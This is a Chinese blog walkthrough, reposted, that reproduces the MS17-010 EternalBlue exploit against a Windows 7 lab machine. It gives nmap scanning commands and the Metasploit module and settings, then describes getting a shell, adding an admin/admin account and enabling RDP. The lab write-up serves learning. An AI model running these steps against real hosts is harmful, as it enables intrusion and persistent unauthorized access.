MS17010(永恒之蓝)漏洞复现

大家好，又见面了，我是你们的朋友全栈君。

MS17010(永恒之蓝)漏洞利用与复现

首先需要准备win7的环境做为靶机

获取信息

利用nmap扫描得到,靶机IP

nmap -sP 192.168.229.0/24

得到： IP：192.168.229.169

在这里插入图片描述

然后利用：

nmap --script=vuln 192.168.229.169

得到靶机信息：

在这里插入图片描述

发现可能利用的漏洞： ms17-010

然后启动msf

msfconsole

然后查找漏洞路径：

search ms17-010

在这里插入图片描述

使用payload进行攻击：

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.229.169
run

在这里插入图片描述

然后输入：shell

在这里插入图片描述

然后在查看当前用户：

net user

在这里插入图片描述

发现用乱码可以用这个取消乱码：

chcp 65001

然后添加一个admin用户密码也为admin

在这里插入图片描述

然后开启3389端口:

在这里插入图片描述

然后在开启远程控制：

在这里插入图片描述

得到：

在这里插入图片描述

发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/132483.html原文链接：https://javaforall.cn